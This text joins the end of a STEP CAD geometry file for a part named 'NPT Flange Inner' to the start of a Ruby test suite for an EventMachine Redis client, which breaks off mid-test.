20143325668,0.939692620785909,0.));\r\n#615=DIRECTION('',(0.,0.,-1.));\r\n#616=DIRECTION('',(0.342020143325668,0.939692620785909,0.));\r\n#617=DIRECTION('center_axis',(0.,0.,1.));\r\n#618=DIRECTION('ref_axis',(0.819152044288994,0.573576436351043,0.));\r\n#619=DIRECTION('center_axis',(0.,0.,-1.));\r\n#620=DIRECTION('ref_axis',(0.819152044288994,0.573576436351043,0.));\r\n#621=DIRECTION('',(0.,0.,1.));\r\n#622=DIRECTION('center_axis',(0.,1.,0.));\r\n#623=DIRECTION('ref_axis',(-1.,0.,0.));\r\n#624=DIRECTION('',(0.,0.,-1.));\r\n#625=DIRECTION('',(-1.,0.,0.));\r\n#626=DIRECTION('center_axis',(0.,0.,1.));\r\n#627=DIRECTION('ref_axis',(0.707106781186546,-0.707106781186549,0.));\r\n#628=DIRECTION('center_axis',(0.,0.,-1.));\r\n#629=DIRECTION('ref_axis',(0.707106781186546,-0.707106781186549,0.));\r\n#630=DIRECTION('',(0.,0.,-1.));\r\n#631=DIRECTION('',(0.,0.,1.));\r\n#632=DIRECTION('center_axis',(1.,3.86164530304402E-16,0.));\r\n#633=DIRECTION('ref_axis',(-7.105427357601E-16,1.,0.));\r\n#634=DIRECTION('',(0.,0.,1.));\r\n#635=DIRECTION('',(-3.86164530304403E-16,1.,0.));\r\n#636=DIRECTION('center_axis',(0.,0.,1.));\r\n#637=DIRECTION('ref_axis',(-0.707106781186544,0.707106781186551,0.));\r\n#638=DIRECTION('center_axis',(0.,0.,-1.));\r\n#639=DIRECTION('ref_axis',(-0.707106781186544,0.707106781186551,0.));\r\n#640=DIRECTION('',(0.,0.,-1.));\r\n#641=DIRECTION('',(0.,0.,1.));\r\n#642=DIRECTION('center_axis',(-1.,0.,0.));\r\n#643=DIRECTION('ref_axis',(0.,-1.,0.));\r\n#644=DIRECTION('',(0.,-1.,0.));\r\n#645=DIRECTION('center_axis',(0.,0.,1.));\r\n#646=DIRECTION('ref_axis',(-0.707106781186546,-0.707106781186549,0.));\r\n#647=DIRECTION('center_axis',(0.,0.,-1.));\r\n#648=DIRECTION('ref_axis',(-0.707106781186546,-0.707106781186549,0.));\r\n#649=DIRECTION('',(0.,0.,-1.));\r\n#650=DIRECTION('',(0.,0.,1.));\r\n#651=DIRECTION('center_axis',(-1.,0.,0.));\r\n#652=DIRECTION('ref_axis',(0.,-1.,0.));\r\n#653=DIRECTION('',(0.,-1.,0.));\r\n#654=DIRECTION('',(0.,0.,1.));\r\n#655=DIRECTION('center_axis',(0.,0.,1.));\r\n#656=DIRECTION('ref_axis',(0.707106781186554,-0.707106781186541,0.));\r\n#657=DIRECTION('',(0.,0.,1.));\r\n#658=DIRECTION('center_axis',(0.,0.,1.));\r\n#659=DIRECTION('ref_axis',(0.707106781186554,-0.707106781186541,0.));\r\n#660=DIRECTION('',(0.,0.,-1.));\r\n#661=DIRECTION('center_axis',(7.40148683083437E-16,1.,0.));\r\n#662=DIRECTION('ref_axis',(-1.,7.105427357601E-16,0.));\r\n#663=DIRECTION('',(-1.,7.40148683083437E-16,0.));\r\n#664=DIRECTION('center_axis',(0.,0.,1.));\r\n#665=DIRECTION('ref_axis',(0.707106781186538,0.707106781186557,0.));\r\n#666=DIRECTION('',(0.,0.,1.));\r\n#667=DIRECTION('center_axis',(0.,0.,1.));\r\n#668=DIRECTION('ref_axis',(0.707106781186538,0.707106781186557,0.));\r\n#669=DIRECTION('',(0.,0.,-1.));\r\n#670=DIRECTION('center_axis',(-1.,0.,0.));\r\n#671=DIRECTION('ref_axis',(0.,-1.,0.));\r\n#672=DIRECTION('',(0.,-1.,0.));\r\n#673=DIRECTION('center_axis',(0.,0.,1.));\r\n#674=DIRECTION('ref_axis',(-0.707106781186551,0.707106781186544,0.));\r\n#675=DIRECTION('',(0.,0.,1.));\r\n#676=DIRECTION('center_axis',(0.,0.,1.));\r\n#677=DIRECTION('ref_axis',(-0.707106781186551,0.707106781186544,0.));\r\n#678=DIRECTION('',(0.,0.,-1.));\r\n#679=DIRECTION('center_axis',(0.,-1.,0.));\r\n#680=DIRECTION('ref_axis',(1.,0.,0.));\r\n#681=DIRECTION('',(1.,0.,0.));\r\n#682=DIRECTION('center_axis',(0.,0.,1.));\r\n#683=DIRECTION('ref_axis',(-0.707106781186541,-0.707106781186554,0.));\r\n#684=DIRECTION('',(0.,0.,1.));\r\n#685=DIRECTION('center_axis',(0.,0.,1.));\r\n#686=DIRECTION('ref_axis',(-0.707106781186541,-0.707106781186554,0.));\r\n#687=DIRECTION('center_axis',(1.,0.,0.));\r\n#688=DIRECTION('ref_axis',(0.,1.,0.));\r\n#689=DIRECTION('',(0.,1.,0.));\r\n#690=DIRECTION('center_axis',(0.,0.,1.));\r\n#691=DIRECTION('ref_axis',(-1.,0.,0.));\r\n#692=DIRECTION('center_axis',(0.,0.,-1.));\r\n#693=DIRECTION('ref_axis',(-1.,0.,0.));\r\n#694=DIRECTION('center_axis',(3.70074341541719E-16,-1.,0.));\r\n#695=DIRECTION('ref_axis',(1.,3.5527136788005E-16,0.));\r\n#696=DIRECTION('',(1.,3.70074341541718E-16,0.));\r\n#697=DIRECTION('center_axis',(0.,0.,1.));\r\n#698=DIRECTION('ref_axis',(0.945945945945946,0.324324324324325,0.));\r\n#699=DIRECTION('center_axis',(0.,0.,1.));\r\n#700=DIRECTION('ref_axis',(0.945945945945946,0.324324324324325,0.));\r\n#701=DIRECTION('',(0.,0.,1.));\r\n#702=DIRECTION('center_axis',(0.,0.,1.));\r\n#703=DIRECTION('ref_axis',(1.,4.44089209850063E-16,0.));\r\n#704=DIRECTION('center_axis',(0.,0.,1.));\r\n#705=DIRECTION('ref_axis',(1.,4.44089209850063E-16,0.));\r\n#706=DIRECTION('center_axis',(0.,0.,1.));\r\n#707=DIRECTION('ref_axis',(1.,0.,0.));\r\n#708=CARTESIAN_POINT('',(0.,0.,0.));\r\n#709=CARTESIAN_POINT('Origin',(-52.,-53.,0.));\r\n#710=CARTESIAN_POINT('',(-52.,-58.,1.5));\r\n#711=CARTESIAN_POINT('',(-57.,-53.,1.5));\r\n#712=CARTESIAN_POINT('Origin',(-52.,-53.,1.5));\r\n#713=CARTESIAN_POINT('',(-57.,-53.,0.));\r\n#714=CARTESIAN_POINT('',(-57.,-53.,0.));\r\n#715=CARTESIAN_POINT('',(-52.,-58.,0.));\r\n#716=CARTESIAN_POINT('Origin',(-52.,-53.,0.));\r\n#717=CARTESIAN_POINT('',(-52.,-58.,0.));\r\n#718=CARTESIAN_POINT('Origin',(-57.,-58.,0.));\r\n#719=CARTESIAN_POINT('',(38.4989623089514,-58.,0.));\r\n#720=CARTESIAN_POINT('',(-57.,-58.,0.));\r\n#721=CARTESIAN_POINT('',(38.4989623089514,-58.,1.5));\r\n#722=CARTESIAN_POINT('',(38.4989623089514,-58.,0.));\r\n#723=CARTESIAN_POINT('',(-57.,-58.,1.5));\r\n#724=CARTESIAN_POINT('Origin',(-3.08188022298012,-12.3817096673894,0.));\r\n#725=CARTESIAN_POINT('',(-57.,-24.,0.));\r\n#726=CARTESIAN_POINT('',(-57.,-23.,0.));\r\n#727=CARTESIAN_POINT('',(-56.,-23.,0.));\r\n#728=CARTESIAN_POINT('Origin',(-56.,-24.,0.));\r\n#729=CARTESIAN_POINT('',(-51.5,-23.,0.));\r\n#730=CARTESIAN_POINT('',(-51.,-23.,0.));\r\n#731=CARTESIAN_POINT('',(-51.,-22.5,0.));\r\n#732=CARTESIAN_POINT('Origin',(-51.5,-22.5,0.));\r\n#733=CARTESIAN_POINT('',(-51.,-11.5,0.));\r\n#734=CARTESIAN_POINT('',(-51.,-11.,0.));\r\n#735=CARTESIAN_POINT('',(-51.5,-11.,0.));\r\n#736=CARTESIAN_POINT('Origin',(-51.5,-11.5,0.));\r\n#737=CARTESIAN_POINT('',(-56.,-11.,0.));\r\n#738=CARTESIAN_POINT('',(-57.,-11.,0.));\r\n#739=CARTESIAN_POINT('',(-57.,-10.,0.));\r\n#740=CARTESIAN_POINT('Origin',(-56.,-10.,0.));\r\n#741=CARTESIAN_POINT('',(-57.,0.,0.));\r\n#742=CARTESIAN_POINT('',(-57.,0.,0.));\r\n#743=CARTESIAN_POINT('',(53.9189189189189,18.4864864864865,0.));\r\n#744=CARTESIAN_POINT('Origin',(0.,0.,0.));\r\n#745=CARTESIAN_POINT('',(55.,12.,0.));\r\n#746=CARTESIAN_POINT('Origin',(35.,12.,0.));\r\n#747=CARTESIAN_POINT('',(55.,-9.99999999999996,0.));\r\n#748=CARTESIAN_POINT('',(55.,-11.,0.));\r\n#749=CARTESIAN_POINT('',(54.,-11.,0.));\r\n#750=CARTESIAN_POINT('Origin',(54.,-9.99999999999996,0.));\r\n#751=CARTESIAN_POINT('',(52.5,-11.,0.));\r\n#752=CARTESIAN_POINT('',(52.,-11.,0.));\r\n#753=CARTESIAN_POINT('',(52.,-11.5,0.));\r\n#754=CARTESIAN_POINT('Origin',(52.5,-11.5,0.));\r\n#755=CARTESIAN_POINT('',(52.,-22.5,0.));\r\n#756=CARTESIAN_POINT('',(52.,-23.,0.));\r\n#757=CARTESIAN_POINT('',(52.5,-23.,0.));\r\n#758=CARTESIAN_POINT('Origin',(52.5,-22.5,0.));\r\n#759=CARTESIAN_POINT('',(53.310810192575,-23.,0.));\r\n#760=CARTESIAN_POINT('',(54.7389581993171,-23.,0.));\r\n#761=CARTESIAN_POINT('',(54.2505028133609,-24.3420201433256,0.));\r\n#762=CARTESIAN_POINT('Origin',(53.310810192575,-24.,0.));\r\n#763=CARTESIAN_POINT('',(43.197425412881,-54.7101007166283,0.));\r\n#764=CARTESIAN_POINT('',(42.,-58.,0.));\r\n#765=CARTESIAN_POINT('Origin',(38.4989623089514,-53.,0.));\r\n#766=CARTESIAN_POINT('',(10.,1.22464679914735E-15,0.));\r\n#767=CARTESIAN_POINT('Origin',(0.,0.,0.));\r\n#768=CARTESIAN_POINT('Origin',(38.4989623089514,-53.,0.));\r\n#769=CARTESIAN_POINT('',(43.197425412881,-54.7101007166283,1.5));\r\n#770=CARTESIAN_POINT('Origin',(38.4989623089514,-53.,1.5));\r\n#771=CARTESIAN_POINT('',(43.197425412881,-54.7101007166283,0.));\r\n#772=CARTESIAN_POINT('Origin',(42.,-58.,0.));\r\n#773=CARTESIAN_POINT('',(54.2505028133609,-24.3420201433256,1.5));\r\n#774=CARTESIAN_POINT('',(54.2505028133609,-24.3420201433256,0.));\r\n#775=CARTESIAN_POINT('',(42.,-58.,1.5));\r\n#776=CARTESIAN_POINT('Origin',(53.310810192575,-24.,0.));\r\n#777=CARTESIAN_POINT('',(53.310810192575,-23.,1.5));\r\n#778=CARTESIAN_POINT('Origin',(53.310810192575,-24.,1.5));\r\n#779=CARTESIAN_POINT('',(53.310810192575,-23.,0.));\r\n#780=CARTESIAN_POINT('Origin',(54.7389581993171,-23.,0.));\r\n#781=CARTESIAN_POINT('',(52.5,-23.,1.5));\r\n#782=CARTESIAN_POINT('',(52.5,-23.,0.));\r\n#783=CARTESIAN_POINT('',(54.7389581993171,-23.,1.5));\r\n#784=CARTESIAN_POINT('Origin',(54.,-9.99999999999996,0.));\r\n#785=CARTESIAN_POINT('',(55.,-9.99999999999996,1.5));\r\n#786=CARTESIAN_POINT('',(54.,-11.,1.5));\r\n#787=CARTESIAN_POINT('Origin',(54.,-9.99999999999996,1.5));\r\n#788=CARTESIAN_POINT('',(54.,-11.,0.));\r\n#789=CARTESIAN_POINT('',(55.,-9.99999999999996,0.));\r\n#790=CARTESIAN_POINT('Origin',(55.,-11.,0.));\r\n#791=CARTESIAN_POINT('',(55.,12.,1.5));\r\n#792=CARTESIAN_POINT('',(55.,12.,0.));\r\n#793=CARTESIAN_POINT('',(55.,-11.,1.5));\r\n#794=CARTESIAN_POINT('Origin',(-56.,-24.,0.));\r\n#795=CARTESIAN_POINT('',(-57.,-24.,1.5));\r\n#796=CARTESIAN_POINT('',(-56.,-23.,1.5));\r\n#797=CARTESIAN_POINT('Origin',(-56.,-24.,1.5));\r\n#798=CARTESIAN_POINT('',(-56.,-23.,0.));\r\n#799=CARTESIAN_POINT('',(-57.,-24.,0.));\r\n#800=CARTESIAN_POINT('Origin',(-57.,-23.,0.));\r\n#801=CARTESIAN_POINT('',(-57.,-23.,1.5));\r\n#802=CARTESIAN_POINT('Origin',(-56.,-10.,0.));\r\n#803=CARTESIAN_POINT('',(-56.,-11.,1.5));\r\n#804=CARTESIAN_POINT('',(-57.,-10.,1.5));\r\n#805=CARTESIAN_POINT('Origin',(-56.,-10.,1.5));\r\n#806=CARTESIAN_POINT('',(-57.,-10.,0.));\r\n#807=CARTESIAN_POINT('',(-56.,-11.,0.));\r\n#808=CARTESIAN_POINT('Origin',(-57.,0.,0.));\r\n#809=CARTESIAN_POINT('',(-57.,0.,1.5));\r\n#810=CARTESIAN_POINT('',(-57.,0.,1.5));\r\n#811=CARTESIAN_POINT('',(-57.,0.,0.));\r\n#812=CARTESIAN_POINT('Origin',(-51.5,-22.5,0.));\r\n#813=CARTESIAN_POINT('',(-51.5,-23.,1.5));\r\n#814=CARTESIAN_POINT('',(-51.5,-23.,0.));\r\n#815=CARTESIAN_POINT('',(-51.,-22.5,1.5));\r\n#816=CARTESIAN_POINT('Origin',(-51.5,-22.5,1.5));\r\n#817=CARTESIAN_POINT('',(-51.,-22.5,0.));\r\n#818=CARTESIAN_POINT('Origin',(-51.,-23.,0.));\r\n#819=CARTESIAN_POINT('',(-51.,-23.,1.5));\r\n#820=CARTESIAN_POINT('Origin',(-51.5,-11.5,0.));\r\n#821=CARTESIAN_POINT('',(-51.,-11.5,1.5));\r\n#822=CARTESIAN_POINT('',(-51.,-11.5,0.));\r\n#823=CARTESIAN_POINT('',(-51.5,-11.,1.5));\r\n#824=CARTESIAN_POINT('Origin',(-51.5,-11.5,1.5));\r\n#825=CARTESIAN_POINT('',(-51.5,-11.,0.));\r\n#826=CARTESIAN_POINT('Origin',(-51.,-11.,0.));\r\n#827=CARTESIAN_POINT('',(-51.,-11.,1.5));\r\n#828=CARTESIAN_POINT('Origin',(52.5,-11.5,0.));\r\n#829=CARTESIAN_POINT('',(52.5,-11.,1.5));\r\n#830=CARTESIAN_POINT('',(52.5,-11.,0.));\r\n#831=CARTESIAN_POINT('',(52.,-11.5,1.5));\r\n#832=CARTESIAN_POINT('Origin',(52.5,-11.5,1.5));\r\n#833=CARTESIAN_POINT('',(52.,-11.5,0.));\r\n#834=CARTESIAN_POINT('Origin',(52.,-11.,0.));\r\n#835=CARTESIAN_POINT('',(52.,-11.,1.5));\r\n#836=CARTESIAN_POINT('Origin',(52.5,-22.5,0.));\r\n#837=CARTESIAN_POINT('',(52.,-22.5,1.5));\r\n#838=CARTESIAN_POINT('',(52.,-22.5,0.));\r\n#839=CARTESIAN_POINT('Origin',(52.5,-22.5,1.5));\r\n#840=CARTESIAN_POINT('Origin',(52.,-23.,0.));\r\n#841=CARTESIAN_POINT('',(52.,-23.,1.5));\r\n#842=CARTESIAN_POINT('Origin',(0.,0.,0.));\r\n#843=CARTESIAN_POINT('',(10.,1.22464679914735E-15,1.5));\r\n#844=CARTESIAN_POINT('Origin',(0.,0.,1.5));\r\n#845=CARTESIAN_POINT('Origin',(-57.,-11.,0.));\r\n#846=CARTESIAN_POINT('',(-57.,-11.,1.5));\r\n#847=CARTESIAN_POINT('Origin',(0.,0.,0.));\r\n#848=CARTESIAN_POINT('',(53.9189189189189,18.4864864864865,1.5));\r\n#849=CARTESIAN_POINT('Origin',(0.,0.,1.5));\r\n#850=CARTESIAN_POINT('',(53.9189189189189,18.4864864864865,0.));\r\n#851=CARTESIAN_POINT('Origin',(35.,12.,0.));\r\n#852=CARTESIAN_POINT('Origin',(35.,12.,1.5));\r\n#853=CARTESIAN_POINT('Origin',(-3.08188022298012,-12.3817096673894,1.5));\r\n#854=UNCERTAINTY_MEASURE_WITH_UNIT(LENGTH_MEASURE(0.01),#858,\r\n'DISTANCE_ACCURACY_VALUE',\r\n'Maximum model space distance between geometric entities at asserted c\r\nonnectivities');\r\n#855=UNCERTAINTY_MEASURE_WITH_UNIT(LENGTH_MEASURE(1.E-6),#858,\r\n'DISTANCE_ACCURACY_VALUE',\r\n'Maximum model space distance between geometric entities at asserted c\r\nonnectivities');\r\n#856=(\r\nGEOMETRIC_REPRESENTATION_CONTEXT(3)\r\nGLOBAL_UNCERTAINTY_ASSIGNED_CONTEXT((#854))\r\nGLOBAL_UNIT_ASSIGNED_CONTEXT((#858,#861,#859))\r\nREPRESENTATION_CONTEXT('','3D')\r\n);\r\n#857=(\r\nGEOMETRIC_REPRESENTATION_CONTEXT(3)\r\nGLOBAL_UNCERTAINTY_ASSIGNED_CONTEXT((#855))\r\nGLOBAL_UNIT_ASSIGNED_CONTEXT((#858,#861,#859))\r\nREPRESENTATION_CONTEXT('','3D')\r\n);\r\n#858=(\r\nLENGTH_UNIT()\r\nNAMED_UNIT(*)\r\nSI_UNIT(.MILLI.,.METRE.)\r\n);\r\n#859=(\r\nNAMED_UNIT(*)\r\nSI_UNIT($,.STERADIAN.)\r\nSOLID_ANGLE_UNIT()\r\n);\r\n#860=DIMENSIONAL_EXPONENTS(0.,0.,0.,0.,0.,0.,0.);\r\n#861=(\r\nCONVERSION_BASED_UNIT('degree',#863)\r\nNAMED_UNIT(#860)\r\nPLANE_ANGLE_UNIT()\r\n);\r\n#862=(\r\nNAMED_UNIT(*)\r\nPLANE_ANGLE_UNIT()\r\nSI_UNIT($,.RADIAN.)\r\n);\r\n#863=PLANE_ANGLE_MEASURE_WITH_UNIT(PLANE_ANGLE_MEASURE(0.01745329252),#862);\r\n#864=SHAPE_DEFINITION_REPRESENTATION(#865,#866);\r\n#865=PRODUCT_DEFINITION_SHAPE('',$,#868);\r\n#866=SHAPE_REPRESENTATION('',(#504),#856);\r\n#867=PRODUCT_DEFINITION_CONTEXT('part definition',#872,'design');\r\n#868=PRODUCT_DEFINITION('NPT Flange Inner','NPT Flange Inner',#869,#867);\r\n#869=PRODUCT_DEFINITION_FORMATION('',$,#874);\r\n#870=PRODUCT_RELATED_PRODUCT_CATEGORY('NPT Flange Inner',\r\n'NPT Flange Inner',(#874));\r\n#871=APPLICATION_PROTOCOL_DEFINITION('international standard',\r\n'automotive_design',2009,#872);\r\n#872=APPLICATION_CONTEXT(\r\n'Core Data for Automotive Mechanical Design Process');\r\n#873=PRODUCT_CONTEXT('part definition',#872,'mechanical');\r\n#874=PRODUCT('NPT Flange Inner','NPT Flange Inner',$,(#873));\r\n#875=PRESENTATION_STYLE_ASSIGNMENT((#877));\r\n#876=PRESENTATION_STYLE_ASSIGNMENT((#878));\r\n#877=SURFACE_STYLE_USAGE(.BOTH.,#879);\r\n#878=SURFACE_STYLE_USAGE(.BOTH.,#880);\r\n#879=SURFACE_SIDE_STYLE('',(#881));\r\n#880=SURFACE_SIDE_STYLE('',(#882));\r\n#881=SURFACE_STYLE_FILL_AREA(#883);\r\n#882=SURFACE_STYLE_FILL_AREA(#884);\r\n#883=FILL_AREA_STYLE('',(#885));\r\n#884=FILL_AREA_STYLE('',(#886));\r\n#885=FILL_AREA_STYLE_COLOUR('',#887);\r\n#886=FILL_AREA_STYLE_COLOUR('',#888);\r\n#887=COLOUR_RGB('',0.749019607843137,0.749019607843137,0.749019607843137);\r\n#888=COLOUR_RGB('',0.945098039215686,0.949019607843137,0.972549019607843);\r\nENDSEC;\r\nEND-ISO-10303-21;\r\n"} {"text": "require File.expand_path(File.dirname(__FILE__) + \"/test_helper.rb\")\nrequire 'logger'\n\nEM.describe EM::Protocols::Redis do\n default_timeout 1\n\n before do\n @r = EM::Protocols::Redis.connect :db => 14\n @r.flushdb\n @r['foo'] = 'bar'\n end\n\n\n should \"be able to provide a logger\" do\n log = StringIO.new\n r = EM::Protocols::Redis.connect :db => 14, :logger => Logger.new(log)\n r.ping do\n log.string.should.include \"ping\"\n done\n end\n end\n\n it \"should be able to PING\" do\n @r.ping { |r| r.should == 'PONG'; done }\n end\n\n it \"should be able to GET a key\" do\n @r.get('foo') { |r| r.should == 'bar'; done }\n end\n\n it \"should be able to SET a key\" do\n @r['foo'] = 'nik'\n @r.get('foo') { |r| r.should == 'nik'; done }\n end\n\n it \"should properly handle trailing newline characters\" do\n @r['foo'] = \"bar\\n\"\n @r.get('foo') { |r| r.should == \"bar\\n\"; done }\n end\n\n it \"should store and retrieve all possible characters at the beginning and the end of a string\" do\n (0..255).each do |char_idx|\n string = \"#{char_idx.chr}---#{char_idx.chr}\"\n @r['foo'] = string\n @r.get('foo') { |r| r.should == string }\n end\n @r.ping { done }\n end\n\n it \"should be able to SET a key with an expiry\" do\n timeout(3)\n\n @r.set('foo', 'bar', 1)\n @r.get('foo') { |r| r.should == 'bar' }\n EM.add_timer(2) do\n @r.get('foo') { |r| r.should == nil }\n @r.ping { done }\n end\n end\n\n it \"should be able to return a TTL for a key\" do\n @r.set('foo', 'bar', 1)\n @r.ttl('foo') { |r| r.should == 1; done }\n end\n\n it \"should be able to SETNX\" do\n @r['foo'] = 'nik'\n @r.get('foo') { |r| r.should == 'nik' }\n @r.setnx 'foo', 'bar'\n @r.get('foo') { |r| r.should == 'nik' }\n\n @r.ping { done }\n end\n #\n it \"should be able to GETSET\" do\n @r.getset('foo', 'baz') { |r| r.should == 'bar' }\n @r.get('foo') { |r| r.should == 'baz'; done }\n end\n #\n it \"should be able to INCR a key\" do\n @r.del('counter')\n @r.incr('counter') { |r| r.should == 1 }\n @r.incr('counter') { |r| r.should == 2 }\n @r.incr('counter') { |r| r.should == 3 }\n\n @r.ping { done }\n end\n #\n it \"should be able to INCRBY a key\" do\n @r.del('counter')\n @r.incrby('counter', 1) { |r| r.should == 1 }\n @r.incrby('counter', 2) { |r| r.should == 3 }\n @r.incrby('counter', 3) { |r| r.should == 6 }\n\n @r.ping { done }\n end\n #\n it \"should be able to DECR a key\" do\n @r.del('counter')\n @r.incr('counter') { |r| r.should == 1 }\n @r.incr('counter') { |r| r.should == 2 }\n @r.incr('counter') { |r| r.should == 3 }\n @r.decr('counter') { |r| r.should == 2 }\n @r.decr('counter', 2) { |r| r.should == 0; done }\n end\n #\n it \"should be able to RANDKEY\" do\n @r.randkey { |r| r.should.not == nil; done }\n end\n #\n it \"should be able to RENAME a key\" do\n @r.del 'foo'\n @r.del 'bar'\n @r['foo'] = 'hi'\n @r.rename 'foo', 'bar'\n @r.get('bar') { |r| r.should == 'hi' ; done }\n end\n #\n it \"should be able to RENAMENX a key\" do\n @r.del 'foo'\n @r.del 'bar'\n @r['foo'] = 'hi'\n @r['bar'] = 'ohai'\n @r.renamenx 'foo', 'bar'\n @r.get('bar') { |r| r.should == 'ohai' ; done }\n end\n #\n it \"should be able to get DBSIZE of the database\" do\n dbsize_without_foo, dbsize_with_foo = nil\n @r.delete 'foo'\n @r.dbsize { |r| dbsize_without_foo = r }\n @r['foo'] = 0\n @r.dbsize { |r| dbsize_with_foo = r }\n\n @r.ping do\n dbsize_with_foo.should == dbsize_without_foo + 1\n done\n end\n end\n #\n it \"should be able to EXPIRE a key\" do\n timeout(3)\n\n @r['foo'] = 'bar'\n @r.expire 'foo', 1\n @r.get('foo') { |r| r.should == \"bar\" }\n EM.add_timer(2) do\n @r.get('foo') { |r| r.should == nil }\n @r.ping { done }\n end\n end\n #\n it \"should be able to EXISTS\" do\n @r['foo'] = 'nik'\n @r.exists('foo') { |r| r.should == true }\n @r.del 'foo'\n @r.exists('foo') { |r| r.should == false ; done }\n end\n #\n it \"should be able to KEYS\" do\n @r.keys(\"f*\") { |keys| keys.each { |key| @r.del key } }\n @r['f'] = 'nik'\n @r['fo'] = 'nak'\n @r['foo'] = 'qux'\n @r.keys(\"f*\") { |r| r.sort.should == ['f', 'fo', 'foo'].sort }\n\n @r.ping { done }\n end\n #\n it \"should be able to return a random key (RANDOMKEY)\" do\n 3.times do |i|\n @r.randomkey do |r|\n @r.exists(r) do |e|\n e.should == true\n done if i == 2\n end\n end\n end\n end\n #\n it \"should be able to check the TYPE of a key\" do\n @r['foo'] = 'nik'\n @r.type('foo') { |r| r.should == \"string\" }\n @r.del 'foo'\n @r.type('foo') { |r| r.should == \"none\" ; done }\n end\n #\n it \"should be able to push to the head of a list (LPUSH)\" do\n @r.lpush \"list\", 'hello'\n @r.lpush \"list\", 42\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lpop('list') { |r| r.should == '42'; done }\n end\n #\n it \"should be able to push to the tail of a list (RPUSH)\" do\n @r.rpush \"list\", 'hello'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 1 ; done }\n end\n #\n it \"should be able to pop the tail of a list (RPOP)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush\"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.rpop('list') { |r| r.should == 'goodbye'; done }\n end\n #\n it \"should be able to pop the head of a list (LPOP)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lpop('list') { |r| r.should == 'hello'; done }\n end\n #\n it \"should be able to get the length of a list (LLEN)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 ; done }\n end\n #\n it \"should be able to get a range of values from a list (LRANGE)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.rpush \"list\", '1'\n @r.rpush \"list\", '2'\n @r.rpush \"list\", '3'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 5 }\n @r.lrange('list', 2, -1) { |r| r.should == ['1', '2', '3']; done }\n end\n #\n it \"should be able to trim a list (LTRIM)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.rpush \"list\", '1'\n @r.rpush \"list\", '2'\n @r.rpush \"list\", '3'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 5 }\n @r.ltrim 'list', 0, 1\n @r.llen('list') { |r| r.should == 2 }\n @r.lrange('list', 0, -1) { |r| r.should == ['hello', 'goodbye']; done }\n end\n #\n it \"should be able to get a value by indexing into a list (LINDEX)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lindex('list', 1) { |r| r.should == 'goodbye'; done }\n end\n #\n it \"should be able to set a value by indexing into a list (LSET)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'hello'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lset('list', 1, 'goodbye') { |r| r.should == 'OK' }\n @r.lindex('list', 1) { |r| r.should == 'goodbye'; done }\n end\n #\n it \"should be able to remove values from a list (LREM)\" do\n @r.rpush \"list\", 'hello'\n @r.rpush \"list\", 'goodbye'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 2 }\n @r.lrem('list', 1, 'hello') { |r| r.should == 1 }\n @r.lrange('list', 0, -1) { |r| r.should == ['goodbye']; done }\n end\n\n it \"should be able to pop values from a list and push them onto a temp list(RPOPLPUSH)\" do\n @r.rpush \"list\", 'one'\n @r.rpush \"list\", 'two'\n @r.rpush \"list\", 'three'\n @r.type('list') { |r| r.should == \"list\" }\n @r.llen('list') { |r| r.should == 3 }\n @r.lrange('list', 0, -1) { |r| r.should == ['one', 'two', 'three'] }\n @r.lrange('tmp', 0, -1) { |r| r.should == [] }\n @r.rpoplpush('list', 'tmp') { |r| r.should == 'three' }\n @r.lrange('tmp', 0, -1) { |r| r.should == ['three'] }\n @r.rpoplpush('list', 'tmp') { |r| r.should == 'two' }\n @r.lrange('tmp', 0, -1) { |r| r.should == ['two', 'three'] }\n @r.rpoplpush('list', 'tmp') { |r| r.should == 'one' }\n @r.lrange('tmp', 0, -1) { |r| r.should == ['one', 'two', 'three']; done }\n end\n #\n it \"should be able add members to a set (SADD)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.type('set') { |r| r.should == \"set\" }\n @r.scard('set') { |r| r.should == 2 }\n @r.smembers('set') { |r| r.sort.should == ['key1', 'key2'].sort; done }\n end\n #\n it \"should be able delete members to a set (SREM)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.type('set') { |r| r.should == \"set\" }\n @r.scard('set') { |r| r.should == 2 }\n @r.smembers('set') { |r| r.sort.should == ['key1', 'key2'].sort }\n @r.srem('set', 'key1')\n @r.scard('set') { |r| r.should == 1 }\n @r.smembers('set') { |r| r.should == ['key2']; done }\n end\n #\n it \"should be able to return and remove random key from set (SPOP)\" do\n @r.sadd \"set_pop\", \"key1\"\n @r.sadd \"set_pop\", \"key2\"\n @r.spop(\"set_pop\") { |r| r.should.not == nil }\n @r.scard(\"set_pop\") { |r| r.should == 1; done }\n end\n #\n it \"should be able to return random key without delete the key from a set (SRANDMEMBER)\" do\n @r.sadd \"set_srandmember\", \"key1\"\n @r.sadd \"set_srandmember\", \"key2\"\n @r.srandmember(\"set_srandmember\") { |r| r.should.not == nil }\n @r.scard(\"set_srandmember\") { |r| r.should == 2; done }\n end\n #\n it \"should be able count the members of a set (SCARD)\" do\n @r.sadd \"set\", 'key1'\n @r.sadd \"set\", 'key2'\n @r.type('set') { |r| r.should == \"set\" }\n @r.scard('set') { |r| r.should == 2; done }\n end\n #\n it \"should be able test for set membership (SISMEMBER)\" do\n 